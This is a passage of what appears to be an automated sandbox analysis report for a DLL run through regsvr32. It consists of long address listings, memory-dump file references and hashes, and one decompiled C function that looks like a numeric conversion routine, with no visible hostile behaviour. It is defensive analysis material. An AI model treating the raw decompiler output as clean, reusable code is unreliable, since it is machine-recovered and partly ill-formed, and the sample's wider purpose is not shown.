                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ecdc
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004f113

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cb3da565d23a43700c0e4db8cb27e6441ea344ca13482d821b65986fd51e31d8
                                                                              • Instruction ID: d0c665f968c3909d57986e82f3ab28182905888c155882e8ed8158f48194a88a
                                                                              • Opcode Fuzzy Hash: cb3da565d23a43700c0e4db8cb27e6441ea344ca13482d821b65986fd51e31d8
                                                                              • Instruction Fuzzy Hash: 2C5106776287D5C6D760CF29E0047AEB7A1F385780FA1411AEA8983E68DB7DD444CF04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004F10C Relevance: .1, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E1004F10C(void* __ebx, void* __ebp, unsigned long long __rax, long long __r8, void* __r11, long long* __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, intOrPtr _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t134;
				signed short _t145;
				signed short _t146;
				signed short _t150;
				signed short _t151;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t172;
				signed int _t174;
				void* _t176;
				signed int _t177;
				signed int _t179;
				signed short _t180;
				signed short _t181;
				signed int _t183;
				signed int _t187;
				signed int _t189;
				signed short _t193;
				signed int _t194;
				signed int _t197;
				void* _t198;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t240;
				unsigned long long _t242;
				signed long long _t246;
				void* _t247;
				void* _t248;
				long long _t250;
				signed int* _t251;
				void* _t253;
				void* _t255;
				signed long long _t258;
				long long _t260;
				void* _t262;
				signed int* _t263;
				void* _t264;
				signed int _t265;
				void* _t266;
				char* _t267;
				signed short* _t268;
				long long* _t270;
				signed int* _t273;

				_t270 = __r13;
				_t266 = __r11;
				_t260 = __r8;
				_t236 = __rax;
				_t203 = __ebp;
				_t176 = __ebx;
				_t242 = 0x10000000;
				while(r9d != 0xa) {
					_t260 = _t260 + 1;
					if(r9d <= 0xb) {
						_t236 = 0x10000000;
						_t242 = _t242 + 0x10000000;
						goto __rcx;
					}
				}
				_t197 = 0;
				 *_t270 = _t260;
				if(_t203 == 0) {
					r8d = 0;
					_t189 = 0;
					_t197 = 4;
					goto L98;
				} else {
					if(r10d <= 0x18) {
						__eflags = r10d;
						if(r10d == 0) {
							r8d = 0;
							_t189 = 0;
							L98:
							_t179 = 0;
							_t134 = 0;
							__eflags = 0;
							L99:
							_t263 = _a72;
							_t263[2] = _t134 | _a52;
							 *_t263 = _t179;
							_t263[0] = _t189;
							_t263[1] = r8d;
							return E10038D20(_t179, _a160 ^ _t258);
						}
						L11:
						_t267 = _t266 - 1;
						if( *_t267 != 0) {
							L14:
							_t8 =  &_a96; // 0x61
							_t9 =  &_a128; // 0x81
							E10052690(r10d, _t240, _t9, _t248, _t253, _t255, _t8, _t262, _t264, _t267);
							if(r14d >= 0) {
								r8d = _a48;
							} else {
								r8d = _a48;
								r8d =  ~r8d;
							}
							r8d = r8d + _t176;
							if(r12d == 0) {
								r8d = r8d + _a288;
							}
							if(r15d == 0) {
								r8d = r8d - _a296;
							}
							if(r8d > 0x1450) {
								_t189 = _t197;
								_t134 = 0x7fff;
								r8d = 0x80000000;
								_t197 = 2;
								_t179 = 0;
								goto L99;
							} else {
								if(r8d < 0xffffebb0) {
									r8d = _t197;
									_t189 = _t197;
									_t197 = 1;
									goto L98;
								}
								_t250 = 0x10070ac0;
								if(r8d == 0) {
									L93:
									_t179 = _a96 & 0x0000ffff;
									_t189 = _a98;
									r8d = _a102;
									_t134 = _a104 >> 0x10;
									goto L99;
								}
								if(r8d < 0) {
									r8d =  ~r8d;
									_t250 = 0x10070c20;
								}
								_t141 =  ==  ? 0 : _a96 & 0x0000ffff;
								_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
								if(r8d == 0) {
									_t197 = 0;
									__eflags = 0;
								} else {
									r9d = 0xffff8000;
									do {
										_t250 = _t250 + 0x54;
										r8d = r8d >> 3;
										_a48 = r8d;
										_a64 = _t250;
										if((r8d & 0x00000007) == 0) {
											goto L90;
										}
										_t246 = _t236 + _t236 * 2;
										_t273 = _t250 + _t246 * 4;
										if( *((short*)(_t250 + _t246 * 4)) >= 0x8000) {
											_t25 =  &_a112; // 0x71
											_t246 = _t25;
											 *_t246 =  *_t273;
											_t172 = _t273[2];
											_t27 =  &_a112; // 0x71
											_t273 = _t27;
											 *(_t246 + 8) = _t172;
											_t236 = _a112 >> 0x10;
											_a114 = _t172 - 1;
										}
										_t180 = _t273[2] & 0x0000ffff;
										_t145 = _a106 & 0x0000ffff;
										r15d = 0;
										_t181 = _t180 & 0x00007fff;
										_a80 = 0;
										_t146 = _t145 & 0x00007fff;
										_a84 = 0;
										_t193 = (_t180 & 0x0000ffff ^ _t145) & 0x00008000;
										_a88 = 0;
										_a56 = _t193;
										_t198 = _t236 + _t246;
										if(_t146 >= 0x7fff || _t181 >= 0x7fff || _t198 > 0xbffd) {
											__eflags = _t193;
											_t250 = _a64;
											_t148 =  !=  ? r9d : 0x7fff8000;
											_a100 = 0;
											_a96 = 0;
											_a104 =  !=  ? r9d : 0x7fff8000;
										} else {
											if(_t198 > 0x3fbf) {
												__eflags = _t146;
												if(_t146 != 0) {
													L41:
													__eflags = _t181;
													if(_t181 != 0) {
														L46:
														r13d = 0;
														_t251 =  &_a84;
														r12d = 5;
														do {
															__eflags = r12d;
															_t177 = r12d;
															_t247 = _t270 + _t270;
															if(r12d <= 0) {
																goto L61;
															}
															_t55 =  &(_t273[2]); // 0x9
															_t265 = _t55;
															_t57 = _t247 + 0x60; // 0x65
															_t268 = _t258 + _t57;
															_t202 = r13d & 0x00000001;
															__eflags = _t202;
															do {
																_t183 = ( *_t268 & 0x0000ffff) * ( *_t265 & 0x0000ffff);
																__eflags = _t202;
																if(_t202 == 0) {
																	r8d = 0;
																	r9d = _t236 + _t247;
																	__eflags = r9d -  *(_t251 - 4);
																	if(r9d <  *(_t251 - 4)) {
																		L56:
																		r8d = 1;
																		L57:
																		 *(_t251 - 4) = r9d;
																		goto L58;
																	}
																	__eflags = r9d - _t183;
																	if(r9d >= _t183) {
																		goto L57;
																	}
																	goto L56;
																}
																r8d = 0;
																r9d = _t236 + _t247;
																__eflags = r9d -  *(_t251 - 4);
																if(r9d <  *(_t251 - 4)) {
																	L52:
																	r8d = 1;
																	L53:
																	 *(_t251 - 4) = r9d;
																	goto L58;
																}
																__eflags = r9d - _t183;
																if(r9d >= _t183) {
																	goto L53;
																}
																goto L52;
																L58:
																__eflags = r8d;
																if(r8d != 0) {
																	 *_t251 =  *_t251 + 1;
																	__eflags =  *_t251;
																}
																_t177 = _t177 - 1;
																_t268 =  &(_t268[1]);
																_t265 = _t265 - 2;
																__eflags = _t177;
															} while (_t177 > 0);
															L61:
															r12d = r12d - 1;
															_t251 =  &(_t251[0]);
															r13d = r13d + 1;
															__eflags = r12d;
														} while (r12d > 0);
														_t199 = _t198 + 0xc002;
														__eflags = _t199;
														if(__eflags <= 0) {
															r8d = _a88;
															_t194 = _a84;
															r9d = _a80;
															L76:
															_t199 = _t199 + 0xffff;
															__eflags = _t199;
															if(_t199 >= 0) {
																L68:
																_t150 = _a80 & 0x0000ffff;
																L69:
																__eflags = _t150 - 0x8000;
																if(_t150 > 0x8000) {
																	L71:
																	_t151 = _a82;
																	__eflags = _t151 - 0xffffffff;
																	if(_t151 != 0xffffffff) {
																		_t152 = _t151 + 1;
																		__eflags = _t152;
																		_a82 = _t152;
																		_t194 = _a84;
																	} else {
																		_t156 = _a86;
																		_a82 = 0;
																		__eflags = _t156 - 0xffffffff;
																		if(_t156 != 0xffffffff) {
																			_a86 = _t156 + 1;
																			r8d = _a88;
																			_t194 = _a84;
																		} else {
																			_t158 = _a90 & 0x0000ffff;
																			_a86 = 0;
																			__eflags = _t158 - 0xffff;
																			if(_t158 != 0xffff) {
																				_t194 = _a84;
																				_a90 = _t158 + 1;
																				r8d = _a88;
																			} else {
																				_t194 = _a84;
																				_a90 = 0x8000;
																				r8d = _a88;
																				_t199 = _t199 + 1;
																			}
																		}
																	}
																	L86:
																	__eflags = _t199 - 0x7fff;
																	if(_t199 < 0x7fff) {
																		_a98 = _t194;
																		_t250 = _a64;
																		_a102 = r8d;
																		r8d = _a48;
																		_a96 = _a82 & 0x0000ffff;
																		_a106 = _t199 | _a56;
																		r9d = 0xffff8000;
																	} else {
																		__eflags = _a56;
																		_t250 = _a64;
																		r8d = _a48;
																		r9d = 0xffff8000;
																		_a100 = 0;
																		_t155 =  !=  ? r9d : 0x7fff8000;
																		_a96 = 0;
																		_a104 =  !=  ? r9d : 0x7fff8000;
																	}
																	goto L90;
																}
																r9d = r9d & 0x0001ffff;
																__eflags = r9d - 0x18000;
																if(r9d != 0x18000) {
																	goto L86;
																}
																goto L71;
															}
															r10d =  ~(_t199 & 0x0000ffff) & 0x0000ffff;
															_t199 = _t199 + r10w;
															__eflags = _t199;
															do {
																__eflags = _a80 & 0x00000001;
																if((_a80 & 0x00000001) != 0) {
																	r15d = r15d + 1;
																	__eflags = r15d;
																}
																r9d = r9d >> 1;
																r9d = r9d | _t194 << 0x0000001f;
																r8d = r8d >> 1;
																_t194 = _t194 >> 0x00000001 | r8d << 0x0000001f;
																_t265 = _t265 - 1;
																__eflags = _t265;
																_a80 = r9d;
															} while (_t265 != 0);
															__eflags = r15d;
															_a84 = _t194;
															_a88 = r8d;
															if(r15d == 0) {
																goto L68;
															}
															_t150 = r9w | 0x00000001;
															_a80 = _t150;
															r9d = _a80;
															goto L69;
														}
														r8d = _a88;
														_t194 = _a84;
														r9d = _a80;
														while(1) {
															asm("inc ecx");
															if(__eflags < 0) {
																break;
															}
															r8d = r8d + r8d;
															_t187 = _t194 >> 0x1f;
															r9d = r9d + r9d;
															_t194 = _t194 + _t194 | r9d >> 0x0000001f;
															r8d = r8d | _t187;
															_t199 = _t199 + 0xffff;
															_a84 = _t194;
															_a88 = r8d;
															__eflags = _t199;
															_a80 = r9d;
															if(__eflags > 0) {
																continue;
															}
															goto L76;
														}
														__eflags = _t199;
														if(_t199 <= 0) {
															goto L76;
														}
														goto L68;
													}
													_t198 = _t198 + 1;
													asm("btr eax, 0x1f");
													__eflags = _t273[2];
													if(_t273[2] != 0) {
														goto L46;
													}
													__eflags = _t273[1];
													if(_t273[1] != 0) {
														goto L46;
													}
													__eflags =  *_t273;
													if( *_t273 != 0) {
														goto L46;
													}
													_t250 = _a64;
													_a104 = 0;
													_a100 = 0;
													_a96 = 0;
													goto L90;
												}
												_t198 = _t198 + 1;
												asm("btr eax, 0x1f");
												__eflags = _a104;
												if(_a104 != 0) {
													goto L41;
												}
												__eflags = _a100;
												if(_a100 != 0) {
													goto L41;
												}
												__eflags = _a96;
												if(_a96 != 0) {
													goto L41;
												}
												_t250 = _a64;
												_a106 = 0;
												goto L90;
											}
											_t250 = _a64;
											_a104 = 0;
											_a100 = 0;
											_a96 = 0;
										}
										L90:
									} while (r8d != 0);
									_t197 = 0;
								}
								goto L93;
							}
						}
						do {
							_t267 = _t267 - 1;
							r10d = r10d + 0xffffffff;
							_t176 = _t176 + 1;
						} while ( *_t267 == 0);
						goto L14;
					}
					_t174 = _a151 & 0x000000ff;
					if(_t174 >= 5) {
						_a151 = _t174 + 1;
					}
					_t266 = _t266 - 1;
					r10d = 0x18;
					_t176 = _t176 + 1;
					goto L11;
				}
			}
















































                                                                              0x1004f10c
                                                                              0x1004f10c
                                                                              0x1004f10c
                                                                              0x1004f10c
                                                                              0x1004f10c
                                                                              0x1004f10c
                                                                              0x1004f10c
                                                                              0x1004f113
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ecdc
                                                                              0x1004ece3
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004eccc
                                                                              0x1004f11d
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x00000000
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2d7
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13f
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2b620fd709328e5915e9b7e94997b806ce6e095567d9ada10d6dbddd80f238b
